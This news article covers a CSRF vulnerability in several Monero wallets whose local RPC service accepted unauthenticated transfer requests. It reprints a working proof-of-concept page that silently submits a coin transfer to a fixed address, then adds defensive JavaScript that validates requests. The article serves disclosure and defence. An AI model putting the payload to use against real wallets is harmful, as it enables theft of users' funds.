Monero Wallet Security Threat Fixed with the Latest Hotfix

BitsPlan

Owing to its additional privacy and security features, Monero is giving Bitcoin tough competition as a darknet currency. However, a recent security alert indicates that even though Monero transactions are safe and secure, the wallets aren’t.

MWR Labs, a cybersecurity company, released an advisory earlier this month describing a Cross-Site Request Forgery (CSRF) vulnerability. The vulnerability could potentially allow attackers to remotely steal Monero from users running a vulnerable version of a wallet. The vulnerable wallets included Monero SimpleWallet, LightWallet, Wallet Chrome, GUI Client.net, Minonodo and other wallets for JS, NodeJS, and QT.

All of these vulnerable wallets hosted an RPC web service on localhost, port 18082, that did not require user authentication to initiate a payment. Any web page opened in the user's browser could therefore submit a transfer request to the wallet on the user's behalf. In its advisory, MWR Labs also posted a code snippet that can be used to exploit the vulnerability. Here is what it looks like:

<html>
    <form action=http://127.0.0.1:18082/json_rpc method=post enctype="text/plain" name="pay">
        <input name='{"jsonrpc":"2.0","id":"0","method":"transfer","params":{"destinations":[{"amount":100000000000,"address":"49FuXtv95dkZj5aDaoWkbjQRv9Qu6UMwAAJKP68vksbpRJEPNZfkr6Ecbj9wrqG4xHAiMArmpGsxRbkmxAC8NEydBEvc162"}],"fee":000000000000,"mixin":3,"unlock_time":0,"payment_id":"","get_tx_key":true}}' type='hidden'>
    </form>
    <script>
         document.pay.submit()
    </script>
</html>

Since the issue was made public, the team behind the Monero cryptocurrency has fixed it.
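As an added example (not code from the MWR Labs advisory or from any Monero wallet), the JavaScript below shows request checks a localhost JSON-RPC listener can apply so that the auto-submitted form above is rejected. The function names, the bearer-token scheme and the sample requests are assumptions made for illustration.

```javascript
// Added example, not code from the advisory or from any Monero wallet.
// Policy, function names and sample requests are constructed for illustration.

// Body types an HTML <form> can POST cross-site without a CORS preflight.
const FORM_TYPES = ["text/plain", "application/x-www-form-urlencoded", "multipart/form-data"];

// Length-checked comparison that does not exit early on the first mismatch.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { method, headers }. Returns { allow, reason } so each rejection can be logged.
function checkRpcRequest(req, expectedToken, port) {
  const h = {};
  for (const [k, v] of Object.entries(req.headers)) h[k.toLowerCase()] = String(v);

  if (req.method !== "POST") return { allow: false, reason: "method" };

  // Host must name the loopback listener itself.
  const hosts = [`127.0.0.1:${port}`, `localhost:${port}`];
  if (!hosts.includes((h["host"] || "").toLowerCase())) return { allow: false, reason: "host" };

  // Current browsers attach Origin to cross-site POSTs; a local RPC client sends none.
  if ("origin" in h) return { allow: false, reason: "origin" };

  // Accept only application/json, which a plain form cannot produce.
  const ctype = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (FORM_TYPES.includes(ctype)) return { allow: false, reason: "form-content-type" };
  if (ctype !== "application/json") return { allow: false, reason: "content-type" };

  // A form cannot set an Authorization header, so a per-wallet secret blocks the forgery.
  const auth = h["authorization"] || "";
  if (!auth.startsWith("Bearer ") || !constantTimeEqual(auth.slice(7), expectedToken))
    return { allow: false, reason: "auth" };

  return { allow: true, reason: "ok" };
}

// Constructed samples: the forged form as a browser would send it, and a local client.
const TOKEN = "constructed-sample-token";
const forged = { method: "POST", headers: { Host: "127.0.0.1:18082", Origin: "http://attacker.example", "Content-Type": "text/plain" } };
const legit = { method: "POST", headers: { Host: "127.0.0.1:18082", "Content-Type": "application/json", Authorization: `Bearer ${TOKEN}` } };

console.log(checkRpcRequest(forged, TOKEN, 18082));
console.log(checkRpcRequest(legit, TOKEN, 18082));
```

The Origin and content-type checks are defence in depth; the authentication check is the one that holds even when a browser omits Origin.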

Source: NewsBTC USA